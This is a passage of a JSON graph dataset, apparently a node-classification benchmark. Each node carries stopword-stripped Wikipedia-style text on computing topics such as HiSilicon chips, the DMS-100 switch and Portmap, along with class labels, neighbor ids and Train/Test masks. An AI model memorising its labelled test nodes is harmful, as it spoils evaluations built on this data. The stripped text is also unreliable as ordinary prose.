    "neighbors": [
      10968,
      4067,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11282,
    "label": 3,
    "text": "HiSilicon:hisilicon hisilicon chinese fabless semiconductor company based shenzhen guangdong fully owned huawei hisilicon purchases licenses cpu designs arm holdings including arm cortex-a9 mpcore arm cortex-m3 arm cortex-a7 mpcore arm cortex-a15 mpcore arm cortex-a53 arm cortex-a57 also mali graphics cores hisilicon also purchased licenses vivante corporation gc4000 graphics core hisilicon reputed largest domestic designer integrated circuits china hisilicon develops socs based arm architecture though exclusive socs see preliminary use handheld tablet devices parent company huawei first well known product hisilicon k3v2 used huawei ascend quad xl u9510 smartphones huawei mediapad 10 fhd7 tablets chipset based arm cortex-a9 mpcore fabbed 40 nm uses 16 core vivante gc4000 gpu soc supports lpddr2-1066 actual products found lpddr-900 instead lower power consumption revised version k3v2 soc improved support intel baseband soc supports lpddr2-1066 actual products found lpddr-900 instead lower power consumption • supports usb 2.0 13 mp 1080p video encode • kirin 920 soc also contains image processor supports 32 megapixel • supports sd 3.0 uhs-i emmc 4.51 dual-band a/b/g/n wi-fi bluetooth 4.0 low energy usb 2.0 32 mp isp 1080p video encode • supports sd 4.1 uhs-ii ufs 2.0 emmc 5.1 mu-mimo 802.11ac wi-fi bluetooth 4.2 smart usb 3.0 nfs dual isp 42 mp native 10-bit 4k video encode i5 coprocessor tensilica hifi 4 dsp hisilicon first soc based 7 nm finfet technology hisilicon develops smartphone modems although exclusively socs see preliminary use handheld tablet devices parent company huawei balong 700 supports lte tdd/fdd specs mwc 2012 hisilicon released balong 710 multi-mode chipset supporting 3gpp release 9 lte category 4 gti global td-lte initiative balong 710 designed used k3v2 soc specs balong 720 supports lte cat6 300 mbit/s peak download rate specs balong 750 supports lte cat 12/13 first support 4cc ca 3.5ghz specs balong 765 supports 8×8 mimo technology lte cat.19 downlink data-rate 1.6 gbit/s fdd network 1.16 gbit/s td-lte network specs balong 5g01 supports 3gpp standard 5g downlink speeds 2.3 gbit/s supports 5g across frequency bands including sub-6ghz millimeter wave mmwave specs balong 5000 supports supports 2g 3g 4g 5g specs hisilicon develops server processor socs based arm architecture hi1610 hisilicon first generation server processor announced 2015 features hi1612 hisilicon second generation server processor launched 2016 features kunpeng 916 formally known hi1616 hisilicon third generation server processor launched 2017 kunpeng 916 utilized huawei taishan 2280 balanced server taishan 5280 storage server taishan xr320 high-density server node taishan x6000 high-density server features kunpeng 920 formally known hi1620 hisilicon fourth generation server processor announced 2018 launched 2019 huawei claim kunpeng 920 cpu scores estimated 930 specint®_rate_base2006 kunpeng 920 utilized huawei taishan 2280 v2 balanced server taishan 5280 v2 storage server taishan xa320 v2 high-density server node features kunpeng 930 formally known hi1630 hisilicon fifth-generation server processor announced 2019 scheduled launch 2021 features kunpeng 950 hisilicon sixth-generation server processor announced 2019 scheduled launch 2023 hisilicon also develops ai acceleration chips ai chip manufactured chinese communication electronics manufacturer huawei ascend 310 capable 16 tops int8 8 tops fp16 power consumption 8 w. fabbed tsmc 12nm ffc process ascend 310 chipsets based architecture called da vinci computing engine called 3d cube includes new ai framework called mindspore platform-as-a-service product called modelarts lower-level library called compute architecture neural networks cann ascend 910 7 nm chip delivers 256 tflops fp16 512 tops int8 power consumption 350w ascend cluster 1024 ascend 910 chips reach 256 petaflops fp16 ascend 910 ascend cluster available q2 2019 kirin processors compete products several companies including",
    "neighbors": [
      3585,
      11282,
      9235,
      11289,
      4124,
      1057,
      38,
      4139,
      3117,
      8237,
      9774,
      2097,
      7218,
      8250,
      8253,
      10303,
      7745,
      7747,
      2635,
      97,
      99,
      8812,
      10361,
      9851,
      6268,
      638,
      644,
      11396,
      9863,
      8842,
      146,
      659,
      1682,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6925,
      2838,
      5417,
      810,
      2862,
      7988,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      5467,
      6495,
      1377,
      9581,
      11629,
      6001,
      373,
      6009,
      8058,
      392,
      398,
      1428,
      410,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575,
      8698
    ],
    "mask": "None"
  },
  {
    "node_id": 11283,
    "label": 2,
    "text": "Windows_XP_Media_Center_Edition:windows xp media center edition windows xp media center edition mce version windows xp operating system first version windows include windows media center designed serve home-entertainment hub last version windows xp media center edition 2005 released october 12 2004 windows media center included certain editions later windows versions optional paid addition windows 8 discontinued windows 10 windows xp media center edition following releases based windows xp professional features enabled except domain-joining ability disabled windows xp media center edition 2005 terminal services original release determine underlying edition windows xp particular revision mce based system properties control panel applet used determine revision mce used select media center option general settings area inside mce windows xp media center edition distinguished exclusive component media center media player supports watching recording tv programs well playing dvd-video photo slideshows music media center sports user interface optimized use distance large fonts icons unlike competing commercial dvr products microsoft charge monthly subscription fee media center tv guide service due strict hardware requirements microsoft opted supply media center independent retail version microsoft distributed msdn subscribers original equipment manufacturers certain countries consumers purchase media center preinstalled new computer set-top box embedded device media center higher hardware requirements editions windows xp mce 2005 requires least 1.6 ghz processor directx 9.0 hardware-accelerated gpu ati radeon 9 series nvidia geforce fx series higher 256 mb system ram functionality media center extender support use multiple tuners hdtv playback/recording carries higher system requirements media center much restricted range hardware supports software dvr solutions media center tuners must standardized driver interface must hardware mpeg-2 encoders changed companies ati wrote drivers support mce 2005 all-in-wonder cards hdtv wonder cards closed caption support number features media center remote controls standardized terms button labels functionality degree general layout",
    "neighbors": [
      8576,
      641,
      10624,
      3463,
      651,
      6797,
      639,
      8080,
      3857,
      7057,
      1043,
      2196,
      8976,
      5526,
      10896,
      4505,
      929,
      10658,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      2221,
      7983,
      3250,
      3890,
      9910,
      8124,
      6462,
      7615,
      321,
      7106,
      9539,
      582,
      200,
      1098,
      10957,
      3283,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      9448,
      10989,
      5103,
      5363,
      7796,
      3573,
      3576,
      6265,
      8315,
      636,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 11284,
    "label": 8,
    "text": "PHP-Crawler:php-crawler php-crawler open-source crawling script based php mysql created implement simple possible local website search became popular small websites shared hosting script set distributed terms bsd license",
    "neighbors": [
      3744,
      8769,
      3875,
      8644,
      10341,
      2566,
      3462,
      4473,
      714,
      2318,
      7022,
      944,
      113,
      1240,
      1913,
      2459
    ],
    "mask": "Test"
  },
  {
    "node_id": 11285,
    "label": 7,
    "text": "Artist_Growth:artist growth artist growth cloud-based touring music business management application numerous artist managers tour managers musicians use artist growth boost team collaboration simplify event logistics track finances automate ticket requests quickly find files consolidate data customers artist growth include artists jason aldean tiësto luke combs artist management companies red light vector major record labels artist growth founded matt urmy jonathan sexton 2011 prototype platform launched 2012 desktop version arriving 2013 may 2018 pinnacle financial partners announced taking stake artist growth effort expand music entertainment sports business artist growth software platform tour management live event support application software connects artist artist tour production team artist manager talent agent business manager record label third party tour service providers key product feature sets include artist growth platform includes electronic integrations related software applications artist growth api brings interoperability entertainment industry allowing artists management teams receive data directly partners talent agencies promoters songkick bandsintown users also submit set lists bmi via artist growth app order collect compensation performance royalties 2018 artist growth integrated music tour booking agency rising star travel streamline tour scheduling software today available ios android web 2018 artist growth introduced service labelled ag finance whereby artists apply receive capital fund touring business ag finance delivered partnership music sports entertainment division pinnacle financial partners first ag finance offering announced august 2018 artists may apply receive tour advance loans underwritten booked tour guarantees offering primarily aimed artist management companies emerging artists need growth funding artist growth title best music app mtv music awards named gizmodo app day 2012",
    "neighbors": [
      5784,
      8740,
      2101
    ],
    "mask": "Test"
  },
  {
    "node_id": 11286,
    "label": 5,
    "text": "DMS-100:dms-100 dms-100 switch digital multiplex system dms line telephone exchange switches manufactured northern telecom designed 1970s released 1979 control 100,000 telephone lines purpose dms-100 switch provide local service connections pstn public telephone network designed deliver services subscribers telephone lines trunks provides plain old telephone service pots mobility management cellular phone systems sophisticated business services automatic call distribution acd integrated services digital network isdn meridian digital centrex mdc formerly called integrated business network ibn also provides intelligent network functions cs1-r etsi inap used countries throughout world also dms-200 dms-250 variants tandem switches much hardware used dms-100 possible exception line cards used members dms family including dms-200 toll switch power distribution -48 vdc nominal dc dc converters every shelf provide necessary voltages central control complex comprises central processing unit cpu program store ps data store ds central message controller cmc cpu contains two identical 16-bit processors running hot standby mode original cpu core referred nt40 cpu implemented approximately 250 discrete logic devices across several circuit boards running 36 mhz nt40 core consisted mainly nt1x44 stack card provides register stack functions processor nt1x45 contained arithmetic logic functions nt1x46 provides registers load-route read-only memory rom nt1x47 timing control card provides micro-cycle source microstore decoding functions processor nt1x47 card also contained 2-digit hexadecimal display indicate test result codes condition core nt1x48 processor maintenance card contained thumbwheel faceplate enable various diagnostic tests cpu later modification five circuit boards faster pin-compatible discrete logic devices enabled cpu operate 40 mhz allowing central offices improve call throughput capacity 10 percent cpu configured dual hot standby mode mate exchange bus meb two cpus enables state one cpu continuously compared cpu cycle cycle basis discrepancy two cpus results maintenance circuitry determining cpu fault activity change cpu program store dedicated cpu memory program instructions required cpu processing calls maintenance administrative tasks ps associated cpu contains identical program instructions data store dedicated cpu contains dynamic information per-call basis well customer data office-specific settings cpu also associated ds containing duplicate data central message controller controls flow messages units ccc prioritizes network message controller nmc various network modules nm input/output controller ioc cpus access either cmc share message load line modules peripherals original nt40 based ccc replaced compatible dms supernode 1987 dms supernode computing module first based motorola 68020 central processing unit cpu upgraded motorola 68030 early 1990s upgraded use motorola 88100 88110 reduced instruction set computing risc cpus risc version supernode computing module known brisc bnr reduced instruction set computing cpu brisc cpu dms supernode processing capacity 1,500,000 call attempts per hour dms supernode featured increased processing capacity across distributed architecture allowing development new features services elements dms supernode uses common supernode cpu hardware design differing software used control supernode consists two main elements dms core dms bus dms core provides main computing facility made compute module system load module message controller compute module contains redundant supernode cpus handle call processing maintenance functions like nt40 core operate synchronized mode mate system load module contains necessary software every element dms switch also provides file system data storage functions magnetic tape hard disk message controller provides communications links dms core dms bus dms bus used interconnect dms core switching network input/output controller ioc manage message flows units consists redundant message switches message switches dms bus operate load-sharing mode one provides main clock source dms-100 system others synchronized messages supernode units carried optical ds512 links operating system used generations dms-100 switch called support operating system sos written high level language called protel stood procedure oriented type enforcing language developed bell northern research bnr hardware maintenance administered locally cathode-ray terminals multilevel menu system called mapci various methods used access dms remotely well including modem telnet backups hard drive work administered diskut command line program analog lines terminated individual line cards codec pull-out line drawers frames original design frames called line module lm 32 lines per drawer lms able send caller-id information class services became rare late century supplemented replaced newer line concentrating module lcm duplicated ringing generators serve lm pair lcm dc testing line card relay connect test bus lcm smaller line cards serving 64 lines per physical drawer 2 logical drawers size lm lcm require half space lm number lines majority line cards nt6x17 three relays loop start lines others include nt6x18 four relays slide switch ground start lines newer version nt6x18 eliminated ground switch nt6x18 also ability provide current reversal required coin phones business systems nt6x17ba nt6x18ba known world line card software configurable 15 million functional settings meet almost signalling transmission requirement market nt6x19 line card allows use older style neon message-waiting lamps feature also requires addition card per drawer supplies voltage type nt6x21 cards serve p-sets meridian business sets special analogue telephone proprietary nortel data link operating 8 khz provide advanced call handling services example telephone number may appear multiple p-sets even though telephone one pair wires thus providing simpler replacement key telephone systems lcme isdn service uses ntbx27 cards serve basic rate isdn lines provided ring generators lcme also support linecard types lcms served line group controller lgc communicate ds-30 connections nt6x48aa interface cards lgc number lcms per lgc depends traffic 3-4 lcm per lgc two traffic heavy remote offices anywhere kilometre 100 km host served remote line control module rlcm remote switching center rsc later vintage known rcc2 use t1 links host lgc rccs/rcc2s work like lgcs controlling lcms large remotes may 2+ rcc/rccs equipped links rccs interlinks calls within remote tie host links rccs/rcc2s usually equipped provide calling within remote office host links fail feature called esa emergency stand alone another type remote office known remote carrier urban rcu units typically reside side road large box approx 3 meters across almost 2 meters high almost meter 1980s many telcos installed early version instead pulling cable remote area much cheaper could provide approx 500 lines back needed two 'boxes work- host box called central terminal ct dial tone lines wired remote box called remote terminal rt dial tone 'came used 2-6 t1 links copper i.e ld-1 fiber telcos modernized remote boxes re-configured work directly smu peripheral host dms typically smu handle 3-6 rcus transmitters receivers service circuits trunk module tm miscellaneous trunk module mtm shelves trunks dtc digital trunk controller dtci digital trunk controller isdn pdtc pcm30 digital trunk controller shelves usually two t-1 lines per card ten cards per dtc total 480 ds0 voice channels turn century many original nt6x50aa cards still service perform t-carrier extended superframe signaling performed plug-in replacement nt6x50ab card used services pbx isdn t1s trunks also provisioned spm synchronus peripheral module capable handling 2016 ds0s nearly 4.2x dtc internal connections time switch network 2.56 mbit/s ds-30 speech links carrying thirty channels plus synchronization data channels four wires plus ground wire connections network handled nt6x40aa ds-30 interface card lgc ltc link may also ds-512 optical interfaces using nt6x44aa time switch card lgcs ltcs internally map channels nt6x48aa ds-30 nt6x50aa/ab ds1 interface links available channels nt6x40aa ds-30 nt6x40fa ds-512 interfaces network european pdtcs complemented dtcoi2 dtco2 dtcoi2 designed run pri dpnss services per existing pdtcoi msb7 peripherals dtco2 designed carry cas ss7 per existing pdtco peripheral time division switching performed e-net similar communication module 5ess switch switching network ewsd group switch axe telephone exchange also dms-200 dms-250 variants tandem switches 2006 nortel introduced communication server 1500 cs 1500 softswitch based voip modernize dms based telephone switches cs 1500 softswitch system replace dms component modules except lcms reducing footprint dms-100 one 19 rack allowing operators reduce cooling power requirements significantly successor dms-100 communication server 2000 cs2k shares many components software dms significant difference addition voip technology cs2k 2010 genband purchased nortel networks carrier voip application solutions cvas business 182.5 million nortel defunct",
    "neighbors": [
      8192,
      9410,
      7299,
      1284,
      7811,
      3149,
      2894,
      9391,
      8048,
      9937,
      7286,
      1303,
      3580
    ],
    "mask": "Test"
  },
  {
    "node_id": 11287,
    "label": 9,
    "text": "Yabasic:yabasic yabasic yet another basic free open-source basic interpreter windows unix platforms yabasic originally developed marc-oliver ihm released last stable version 2.77.3 2016 version 2.77.1 project adopted mit licence well source code moved github encourage others participate development port yabasic fltk toolkit called flyab development would source-compatible programs written yab variant yabasic enables graphical programs written using beos api ports windows mac os x linux planned flyab added ability yabasic create native graphical user interfaces supported platforms november 2008 project appears halted sony also packaged version yabasic playstation 2 demo disc shipped ps2 consoles pal territories could considered home computer games machine thus bypassing european import taxes continuation project prior new changes original author version 3 developed team centered pedro sá thomas larsen development halted project appears abandoned",
    "neighbors": [
      10316,
      6797,
      7983,
      9714,
      5492,
      2804,
      11221,
      823,
      6845
    ],
    "mask": "Test"
  },
  {
    "node_id": 11288,
    "label": 5,
    "text": "Mobile_Slotted_Aloha:mobile slotted aloha mobile slotted aloha ms-aloha wireless network protocol proposed applications vehicle networks considering typical taxonomy mac protocols ms-aloha represents hybrid solution based connection-oriented paradigm hence may fall class channel-based/tdma protocols however also reactive topology changes include reservations separate data exchanges classified among packet-based collision-free mac methods general slotted protocol either connectionless connection-oriented however latter case represents true alternative ieee 802.11p introducing determinism carrier sense multiple access collision avoidance csma/ca lacks vehicle networks connection set-up phases telephone call reservation request confirmation data exchange tear-down applied hold broadcast communications hampered hidden stations manageable heavy losses mobility varying channel conditions reasons ms-aloha connection oriented continuously refreshes reservation simply transmitting period ms-aloha adopts different approach subtends following hypotheses rules basically define main mechanisms",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      7490,
      9284,
      5321,
      7498,
      2911,
      2785,
      5092,
      5863,
      2802
    ],
    "mask": "None"
  },
  {
    "node_id": 11289,
    "label": 3,
    "text": "Apple_A10X:apple a10x apple a10x fusion 64-bit arm-based system chip soc designed apple inc. manufactured tsmc first appeared 10.5 ipad pro second-generation 12.9 ipad pro announced june 5 2017 a10x variant a10 apple claims 30 percent faster cpu performance 40 percent faster gpu performance predecessor a9x a10x features apple-designed 64-bit 2.38 ghz armv8-a six-core cpu three high-performance hurricane cores three energy-efficient zephyr cores a10x also integrates twelve-core graphics processing unit gpu appears apple customized imagination powervr cores used a10 embedded a10x m10 motion coprocessor built tsmc 10 nm finfet process die size 96.4mm a10x 34 smaller a9x smallest ipad soc a10x first tsmc 10nm chip used consumer device a10x paired 4 gb lpddr4 memory second-generation 12.9 ipad pro 10.5 ipad pro 3 gb 4k apple tv",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      9235,
      11282,
      6165,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      2673,
      6258,
      10357,
      6264,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      7806,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      7991,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      11257,
      1346,
      8003,
      10562,
      6981,
      838,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      10602,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 11290,
    "label": 3,
    "text": "Ken_Batcher:ken batcher ken batcher full name kenneth edward batcher emeritus professor computer science kent state university also worked computer architect goodyear aerospace akron ohio 28 years born december 1935 queens new york city father ralph r. batcher chief engineer a. h. grebe radio company bankruptcy 1932 batcher graduated iowa state university b.e degree 1957 1964 batcher received ph.d. electrical engineering university illinois graduated brooklyn technical high school among designs worked goodyear published several technical papers owns 14 patents discovered two parallel sorting algorithms odd-even mergesort bitonic mergesort also discoverer scrambling data method random access memory allows accesses along multiple dimensions memories used staran mpp parallel processors 1980 received arnstein award presented goodyear aerospace corporation technical achievement 1990 batcher awarded acm/ieee eckert-mauchly award pioneering work parallel computers holds 14 patents 2007 batcher awarded ieee seymour cray computer engineering award fundamental theoretical practical contributions massively parallel computation including parallel sorting algorithms interconnection networks pioneering designs staran mpp computers credited discovering two important parallel sorting algorithms odd-even mergesort bitonic mergesort batcher known half-serious half-humorous definition supercomputer device turning compute-bound problems i/o-bound problems author co-author journal articles br patent number followed title year issued",
    "neighbors": [
      1480,
      9932
    ],
    "mask": "Test"
  },
  {
    "node_id": 11291,
    "label": 7,
    "text": "Adobe_Document_Cloud:adobe document cloud adobe document cloud free service adobe store share pdf files cloud access go services also allows integration adobe tools fill sign forms electronically service offers 2gb free storage seemless integration mobile desktop apps creates ecosystem users use phone apps adobe scan take pictures documents convert pdfs upload store cloud files accessed webportal adobe document cloud well adobe applications adobe acrobat dc adobe acrobat reader free service upgraded using paid subscriptions allow user create pdfs electronic documents microsoft office documents edit pdfs protect documents using passwords create fillable forms collect feedback signatures",
    "neighbors": [
      11237,
      9097,
      11372,
      3469,
      10097,
      8627,
      8628,
      5048
    ],
    "mask": "Test"
  },
  {
    "node_id": 11292,
    "label": 5,
    "text": "Portmap:portmap port mapper rpc.portmap portmap rpcbind open network computing remote procedure call onc rpc service runs network nodes provide onc rpc services version 2 port mapper protocol maps onc rpc program number/version number pairs network port number version program onc rpc server started tell port mapper particular program number/version number pair implements particular transport protocol tcp udp port number using particular program number/version number pair transport protocol clients wishing make onc rpc call particular version particular onc rpc service must first contact port mapper server machine determine actual tcp udp port use versions 3 4 protocol called rpcbind protocol map program number/version number pair indicator specifies transport protocol transport-layer endpoint address program number/version number pair transport protocol port mapper service always uses tcp udp port 111 fixed port required client would able get port number port mapper service port mapper port mapper must started rpc servers started port mapper service first appeared sunos 2.0 shows different programs versions ports use example shows nfs running version 2 3 reached tcp port 2049 udp port 2049 depending transport protocol client wants use mount protocol version 1 2 running reached udp port 644 tcp port 645 depending transport protocol client wants use port mapper service discovered used distributed denial service ddos attacks distributed reflective denial service drdos attacks 2015 using spoofed port mapper request attacker amplify effects target portmap query return many times data original request",
    "neighbors": [
      10436,
      11147,
      10924,
      11413,
      823,
      11293,
      5471
    ],
    "mask": "Test"
  },
  {
    "node_id": 11293,
    "label": 6,
    "text": "File_Alteration_Monitor:file alteration monitor computing file alteration monitor also known fam sgi_fam provides subsystem developed silicon graphics unix-like operating systems fam subsystem allows applications watch certain files notified modified greatly aids applications fam existed applications would read disk repeatedly detect changes resulted high disk cpu usage example file manager application detect file changed update displayed icon and/or filename fam system consists two parts although fam may seem unnecessary many newer kernels include built-in notification support inotify linux example using fam provides two benefits main problem fam creation large number files example first login desktop environment slows entire system using many cpu cycles",
    "neighbors": [
      2432,
      10051,
      2021,
      11292,
      7983,
      1776,
      8721,
      9872,
      5397,
      823,
      2044,
      4349
    ],
    "mask": "None"
  },
  {
    "node_id": 11294,
    "label": 2,
    "text": "Samsung_Experience:samsung experience samsung experience stylized samsung experience software overlay android launcher designed samsung galaxy devices introduced late 2016 beta build based android nougat galaxy s7 succeeding touchwiz succeeded one ui based android pie touchwiz former name samsung used ui icons originally released june 4 2010 galaxy smartphone reviewers criticized samsung including many features bloat especially galaxy s4 included many users called samsung feature creep following years though samsung incrementally removed bloatware extra features touchwiz longer recognized touchwiz leading rename samsung experience makes several changes android default homescreen apps icon bottom right screen instead bottom middle google search bar middle screen instead top weather widget provided weather channel accuweather select countries devices top right corner screen addition user edit apps grid layout edge curved glass edge screen originally introduced galaxy note edge popularized galaxy s6 edge tasks edge gives users shortcut commonly utilized tasks making phone call certain contact setting timer creating event planner assortment icons e.g contact pictures phone messaging mail icons app icon plus symbol bottom right corner photo library masked shape circle gallery icon bottom right corner right screen people edge allows user add 5 different contacts display screen quick access functions calling texting emailing displays contact name photo apps edge displays ten user frequently used apps five two columns user also add complete folder screen yahoo sports finance news panels included phone user download extra panels ease use rss reader twitter trends news cnn quick tools edge transforms ruler compass flashlight user swipes edge screen screen edge display turns displays missed calls current time weather news first released samsung galaxy note 7 android marshmallow grace ux named device codename eventually made way older devices including galaxy note 5 update korea eventually countries galaxy s7 s7 edge official android nougat update grace ux features cleaner flatter look iconography extensive use white space touchwiz grace ux devices also benefit secure folder functionality enables users keep certain data even apps behind secure password addition countries languages absent previous versions android marshmallow earlier available release starting galaxy tab s3 single pixels illuminated always-on display active screen display current time calendar selected image different styles option clock 7 styles calendar 2 styles image 3 styles always-on display available galaxy series 2017 2018 galaxy s7/s7 edge galaxy s8/s8+ galaxy s9/s9+ galaxy s10/s10+|galaxy s10 5g galaxy j7 2017 /j7 pro/j7+ c7 2017 galaxy c5/c7/c9 pro galaxy note 7/fe/8/9 devices samsung includes file manager galaxy phones unlike stock android game user downloads combined single folder folder one optimize frame rate resolution includes game tools button appears user playing game tapped mute notifications turn capacitive keys minimize game screenshot record gameplay bixby assistant launched samsung galaxy s8 replaces voice samsung phones three parts including bixby voice bixby vision bixby home bixby voice triggered saying hey bixby pressing holding button located volume rocker dubbed bixby button bixby vision built camera app see one see essentially augmented reality camera identify objects real time search various services offer user purchase available bixby also able translate text read qr codes recognize landmarks bixby home found swiping right home screen vertically scrolling list information bixby interact example weather fitness activity buttons controlling smart home gadgets bixby tasks related single keyword example simple good night request device turn silent mode turn night mode display note list exhaustive",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5363,
      6391,
      5892,
      7428,
      2828,
      5397,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      7483,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      10080,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11295,
    "label": 9,
    "text": "Executive_Systems_Problem_Oriented_Language:executive systems problem oriented language espol short executive systems problem oriented language superset algol 60 provided capabilities would later known mohols machine oriented high order languages interrupting processor multiprocessor system burroughs large systems multiprocessor processor systems espol used write mcp master control program burroughs computer systems b5000 b6700 single-pass compiler espol could compile 250 lines per second espol superseded newp",
    "neighbors": [
      512,
      1952,
      11265,
      3716,
      1702,
      4998,
      8136,
      8262,
      1610,
      7983,
      5714,
      11059,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 11296,
    "label": 9,
    "text": "Application_Isolation_API:application isolation api application isolation api jsr 121 provides specification isolating controlling java application life cycles within single java virtual machine jvm multiple jvms isolated computation described isolate communicate exchange resource handles e.g open files isolates messaging facility",
    "neighbors": [
      4960,
      5677
    ],
    "mask": "None"
  },
  {
    "node_id": 11297,
    "label": 2,
    "text": "Yggdrasil_Linux/GNU/X:yggdrasil linux/gnu/x yggdrasil linux/gnu/x lgx pronounced igg-drah-sill discontinued early linux distribution developed yggdrasil computing incorporated company founded adam j. richter berkeley california yggdrasil first company create live cd linux distribution yggdrasil linux described plug-and-play linux distribution automatically configuring hardware last release yggdrasil 1995 yggdrasil world tree norse mythology name chosen yggdrasil took disparate pieces software assembled complete product yggdrasil company motto free software rest us yggdrasil compliant unix filesystem hierarchy standard yggdrasil announced ‘ bootable linux/gnu/x-based unix r clone pc compatibles ’ 24 november 1992 made first release 8 december 1992 alpha release contained 0.98.1 version linux kernel v11r5 version x window system supporting 1024x768 256 colours various gnu utilities c/c++ compiler gnu debugger bison flex make tex groff ghostscript elvis emacs editors various software yggdrasil alpha release required 386 computer 8 mb ram 100 mb hard disk alpha release missing source code packages elvis beta release made 18 february 1993 beta cost us 60 lgx beta release 1993 contained 0.99.5 version linux kernel along software gnu x 22 august 1993 yggdrasil company sold 3100 copies lgx beta distribution production release version carried pricetag us 99 however yggdrasil offered free developer whose software included cd distribution according email company founder marginal cost subscription 35.70 early yggdrasil releases also available stores selling cd-rom software adam j. richter started yggdrasil company together bill selmeier richter spoke michael tiemann setting business interested joining forces cygnus richter member league programming freedom richter using 200 mb hard disk building alpha release lgx prevented practically able include source code packages contained cdrom yggdrasil incorporated published early linux compilation books linux bible gnu testament contributed significantly file system x window system functionality linux early days operation company moved san jose california 1996 1996 yggdrasil incorporated released winter 1996 edition linux internet archives six cds linux software tsx-11 sunsite gnu archive prep.ai.mit.edu x11r6 archives including free contributed x11r6 software ftp.x.org internet rfc standards total nine non-yggdrasil linux distributions company remained active least year 2000 released linux open source dvd website taken offline afterwards company released anything since company last corporate filing january 2004 california secretary state lists suspended company made offer donate 60 yggdrasil cdrom sales revenues computer systems research group founder adam j. richter later indicated company would lose much money changed offer accordingly still maintaining donations csrg company also volume discount plans",
    "neighbors": [
      8837,
      7435,
      10127,
      912,
      2321,
      2195,
      6675,
      5397,
      4887,
      10394,
      673,
      3618,
      3745,
      10530,
      9253,
      10149,
      11297,
      11305,
      7854,
      1839,
      2738,
      4790,
      439,
      56,
      4279,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      6510,
      2671,
      7534,
      7920,
      8177,
      5363,
      9074,
      9461,
      10352,
      6393,
      11643,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11298,
    "label": 3,
    "text": "Reed's_law:reed law reed law assertion david p. reed utility large networks particularly social networks scale exponentially size network reason number possible sub-groups network participants 2 − n − 1 n number participants grows much rapidly either even utility groups available joined small per-group basis eventually network effect potential group membership dominate overall economics system given set n people 2 possible subsets difficult see since form possible subset simply choosing element one two possibilities whether include element however includes one empty set n singletons properly subgroups 2 − n − 1 subsets remain exponential like 2 david p. reed law pack harvard business review february 2001 pp 23–4 reed law often mentioned explaining competitive dynamics internet platforms law states network becomes valuable people easily form subgroups collaborate value increases exponentially number connections business platform reaches sufficient number members generate network effects dominate overall economics system analysts network value functions including andrew odlyzko argued reed law metcalfe law overstate network value fail account restrictive impact human cognitive limits network formation according argument research around dunbar number implies limit number inbound outbound connections human group-forming network manage actual maximum-value structure much sparser 